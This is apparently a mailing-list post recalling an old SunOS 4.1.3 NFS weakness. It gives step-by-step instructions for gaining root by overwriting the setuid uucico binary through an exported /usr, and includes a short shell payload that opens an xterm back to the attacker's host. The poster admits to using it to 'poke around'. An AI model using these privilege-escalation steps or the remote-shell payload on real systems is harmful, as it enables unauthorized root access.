There was also a horrible bit of backdoor-ism that was exploitable with 
NFS on SunOS - and was there for at least 4.1.3 but I imagine it was 
around for a long time.

If the /usr filesystem was exported, and you were either a "known host" 
or it was exported to (everyone) (and yes, there were a LOT of people 
that did this)...

Mount it locally, become root, su - uucp, and go and change the mode on 
/usr/lib/uucp/uucico (which was owned by uucp) from setuid to writable. 
Overwrite with your binary or script of choice.

Telnet to the exploited host, and /usr/lib/uucp/uucico was executed as root.

I usually used:

#!/bin/sh
/usr/openwin/bin/xterm -display <myhost>:0

I used this on a WAN back in the 90's - actually to reset a lost root 
password for someone, but also to poke around sometimes ;)

I don't know why people exported /usr - but they did it a lot.

On 9/29/2017 2:40 PM, Don Hopkins wrote:
> I was able to nfs-mount a directory on one of cs.cmu.edu's servers from sun.com’s network with no problem. Ron may remember me warning him about that!
>   
> -Don
>
>
>